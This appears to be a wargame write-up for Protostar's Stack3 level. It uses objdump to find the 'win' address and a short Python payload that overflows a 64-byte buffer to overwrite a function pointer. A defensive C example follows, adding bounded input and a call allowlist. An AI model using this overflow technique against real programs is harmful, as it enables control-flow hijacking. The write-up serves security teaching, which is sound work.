Protostar 0x03 - Stack3
Prev: 0x02 - Stack2
Next: 0x04 - Stack4
In this level, the objective is to redirect program flow. If we are able to overwrite the "fp" variable with a function pointer, the final "if" statement in the program code tells us that we will execute the function at that address.
Let's try to overwrite "fp" with the address of "win." We can do this one of two ways: first, with gdb which we've used previously (enter "disas win"), or with "objdump." Let's try something new, and call "objdump" with the "-d" switch to disassemble all executable sections of the "stack3" program.
$ objdump -d stack3
...
8048424 <win>:
8048424: 55 push %ebp
8048425: 89 e5 mov %esp,%ebp
8048427: 83 ec 18 sub $0x18,%esp
804842a: c7 04 24 40 85 04 08 movl $0x8048540,(%esp)
8048431: e8 2a ff ff ff call 8048360 <puts@plt>
8048436: c9 leave
8048437: c3 ret
...
So, it looks like the address we're aiming for is 0x08048424. Let's craft another Python script similar to the one in previous levels. We'll build a payload that (1) fills our 64-byte buffer and (2) overwrites the "fp" variable (which we can see immediately follows the "buffer" variable) with the address of "win."
import struct
# Fill the 64-byte "buffer" exactly, so the next bytes land on "fp".
buffer = "A" * 64
# Address of "win" (0x08048424 from objdump) as a 32-bit little-endian value,
# matching the x86 byte order the program stores its pointer in.
win = struct.pack("<I", 0x08048424)
# 68 bytes total: 64 bytes of buffer followed by the 4-byte function pointer.
payload = buffer + win
# Python 2 print; the trailing newline is harmless because gets() stops there.
print payload
Now, we just need to execute this script with Python and pipe the output into the "stack3" program:
$ python stack3.py | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
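Seen from the defensive side, the level boils down to two mistakes: an unbounded read into a 64-byte buffer that sits right below a function pointer, and an indirect call that trusts any non-zero value. The following is an added example, not the Protostar source: it reconstructs that layout as a hypothetical struct, replaces gets() with a bounded reader that rejects overlong lines, and allowlists the call target before jumping. The frame layout, function names and the 68-byte sample input are all assumptions constructed for the demonstration.

```c
#include <string.h>
/* Hypothetical layout matching what the level describes: fp sits right
 * after a 64-byte buffer, so gets() into buffer runs over it. Not Protostar source. */
struct frame {
    char buffer[64];
    int (*fp)(void);
};
static int win(void) { return 1; }   /* the one legitimate target */
int not_allowed(void) { return 2; }  /* stands in for any other address */
/* Replacement for gets(): a line that does not fit in cap-1 bytes is
 * rejected (-1) instead of copied past the end, so fp is never reached. */
static int read_line_bounded(char *dst, size_t cap, const char *src, size_t n)
{
    size_t len = 0;
    while (len < n && src[len] != '\n') len++;
    if (len >= cap) { dst[0] = '\0'; return -1; }
    memcpy(dst, src, len);
    dst[len] = '\0';
    return (int)len;
}
/* Guard the indirect call: non-zero is not enough, the target must be one
 * the program actually intends to call. Returns 0 for NULL or unknown fp. */
static int dispatch(int (*fp)(void))
{
    static int (*const allowed[])(void) = { win };
    size_t i;
    for (i = 0; fp != NULL && i < sizeof allowed / sizeof allowed[0]; i++)
        if (fp == allowed[i]) return fp();
    return 0;
}
/* The level's flow over an in-memory line: -1 if the line was rejected,
 * otherwise dispatch()'s result (0 when fp is still NULL). */
static int run_level(const char *input, size_t n)
{
    struct frame f;
    f.fp = NULL;
    if (read_line_bounded(f.buffer, sizeof f.buffer, input, n) < 0) return -1;
    return dispatch(f.fp);
}

/* Constructed input shaped like the page's payload: 64 'A's then the
 * 4-byte little-endian address struct.pack("<I", 0x08048424) emits. */
static int run_page_payload(void)
{
    char payload[68];
    memset(payload, 'A', 64);
    memcpy(payload + 64, "\x24\x84\x04\x08", 4);
    return run_level(payload, sizeof payload);   /* -1: rejected, fp untouched */
}
```

With the bounded reader the 68-byte line is refused before any byte reaches fp, and even a pointer that did arrive there would not be called unless it matches the allowlist.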
Prev: 0x02 - Stack2
Next: 0x04 - Stack4